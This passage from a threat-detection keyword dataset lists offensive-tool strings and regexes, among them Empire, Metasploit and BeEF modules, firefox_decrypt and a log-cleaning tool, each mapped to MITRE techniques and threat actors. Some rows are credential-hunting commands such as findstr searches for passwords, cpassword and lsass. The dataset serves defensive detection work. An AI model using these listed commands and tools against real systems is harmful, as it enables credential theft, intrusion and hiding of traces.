TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-ComputerDetails.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45103"
"*Find-PSServiceAccounts.ps1*",".{0,1000}Find\-PSServiceAccounts\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","45104"
"*Find-RDPClientConnections*",".{0,1000}Find\-RDPClientConnections.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-ComputerDetails.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45105"
"*Find-Secret -FilePath ./logs.txt -Regex *",".{0,1000}Find\-Secret\s\-FilePath\s\.\/logs\.txt\s\-Regex\s.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","#linux","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","45106"
"*FindSMB2UPTime.py*",".{0,1000}FindSMB2UPTime\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","45107"
"*Findsploit*",".{0,1000}Findsploit.{0,1000}","offensive_tool_keyword","Findsploit","Finsploit is a simple bash script to quickly and easily search both local and online exploit databases. This repository also includes copysploit to copy any exploit-db exploit to the current directory and compilesploit to automatically compile and run any C exploit (ie. ./copysploit 1337.c && ./compilesploit 1337.c)","T1210 - T1105 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/1N3/Findsploit","1","1","N/A","N/A","N/A","10","1729","330","2021-09-27T01:43:24Z","2015-03-16T16:15:55Z","45108"
"*findstr *BEGIN CERTIFICATE*",".{0,1000}findstr\s.{0,1000}BEGIN\sCERTIFICATE.{0,1000}","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A","45109"
"*findstr *confidential*",".{0,1000}findstr\s.{0,1000}confidential.{0,1000}","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A","45110"
"*findstr *net use*",".{0,1000}findstr\s.{0,1000}net\suse.{0,1000}","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A","45112"
"*findstr *password*",".{0,1000}findstr\s.{0,1000}password.{0,1000}","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A","45113"
"*findstr /S /I cpassword *\policies\*.xml*",".{0,1000}findstr\s\/S\s\/I\scpassword\s.{0,1000}\\policies\\.{0,1000}\.xml.{0,1000}","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A","45115"
"*findstr lsass*",".{0,1000}findstr\slsass.{0,1000}","offensive_tool_keyword","findstr","findstr used to find lsass pid in order to dump lsass process","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","N/A","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","45119"
"*findstr.exe Tvndrgaaa*",".{0,1000}findstr\.exe\sTvndrgaaa.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45120"
"*Findsubdomains*",".{0,1000}Findsubdomains.{0,1000}","offensive_tool_keyword","findsubdomains","A subdomains discovery tool that collects all possible subdomains from open source internet and validates them through various tools to provide accurate results.","T1590 - T1591 - T1595 - T1596 - T1599","TA0011","N/A","N/A","Reconnaissance","https://findsubdomains.com/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45121"
"*Find-TrustedDocuments*",".{0,1000}Find\-TrustedDocuments.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Find-TrustedDocuments.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45122"
"*Find-TrustedDocuments.ps1*",".{0,1000}Find\-TrustedDocuments\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1076","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45123"
"*FindUncommonShares.git*",".{0,1000}FindUncommonShares\.git.{0,1000}","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","1","N/A","N/A","N/A","","N/A","","","","45124"
"*FindUncommonShares.p*",".{0,1000}FindUncommonShares\.p.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","45125"
"*FindUncommonShares.py *",".{0,1000}FindUncommonShares\.py\s.{0,1000}","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","0","N/A","N/A","N/A","","N/A","","","","45126"
"*FindUncommonShares-main*",".{0,1000}FindUncommonShares\-main.{0,1000}","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","1","N/A","N/A","N/A","","N/A","","","","45127"
"*finduncshar_scan*",".{0,1000}finduncshar_scan.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","45128"
"*Find-UnsafeLogonScriptPermissions.ps1*",".{0,1000}Find\-UnsafeLogonScriptPermissions\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","45129"
"*Find-UnsafeUNCPermissions -UNCScripts*",".{0,1000}Find\-UnsafeUNCPermissions\s\-UNCScripts.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","45130"
"*Find-UnsafeUNCPermissions.ps1*",".{0,1000}Find\-UnsafeUNCPermissions\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","45131"
"*Find-UserField -SearchField *",".{0,1000}Find\-UserField\s\-SearchField\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45132"
"*Find-VacantComputer*",".{0,1000}Find\-VacantComputer.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","45133"
"*Find-WMILocalAdminAccess*",".{0,1000}Find\-WMILocalAdminAccess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45134"
"*Finish moonwalk and clear your traces*",".{0,1000}Finish\smoonwalk\sand\sclear\syour\straces.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","45135"
"*fir3d0g/mimidogz*",".{0,1000}fir3d0g\/mimidogz.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","45136"
"*FireBuster.ps1*",".{0,1000}FireBuster\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","45137"
"*fireeye*commando*",".{0,1000}fireeye.{0,1000}commando.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","45138"
"*FireFart*dirtycow*",".{0,1000}FireFart.{0,1000}dirtycow.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/FireFart/dirtycow","1","1","N/A","N/A","N/A","9","884","428","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z","45139"
"*firefox/FakeUpdate_files/*",".{0,1000}firefox\/FakeUpdate_files\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","45140"
"*firefox_decrypt.py*",".{0,1000}firefox_decrypt\.py.{0,1000}","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","N/A","10","10","2172","317","2024-11-08T13:52:34Z","2014-01-17T13:25:02Z","45141"
"*firefox_decrypt-main*",".{0,1000}firefox_decrypt\-main.{0,1000}","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","N/A","10","10","2172","317","2024-11-08T13:52:34Z","2014-01-17T13:25:02Z","45142"
"*firefox_extension_bindshell*",".{0,1000}firefox_extension_bindshell.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","45143"
"*firefox_extension_reverse_shell*",".{0,1000}firefox_extension_reverse_shell.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","45144"
"*firefox_privilege_escalation.rb*",".{0,1000}firefox_privilege_escalation\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","45145"
"*firefox_privilege_escalation_spec.rb*",".{0,1000}firefox_privilege_escalation_spec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","45146"
"*firefox_smil_uaf*",".{0,1000}firefox_smil_uaf.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","45147"
"*FireListener.ps1*",".{0,1000}FireListener\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","45148"
"*Firesheep/*",".{0,1000}Firesheep\/.{0,1000}","offensive_tool_keyword","firesheep","Free program for HTTP session hijacking attacks.","T1550 - T1555 - T1559 - T1565","TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://codebutler.github.io/firesheep/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45149"
"*Firewall_Walker_BOF*",".{0,1000}Firewall_Walker_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda 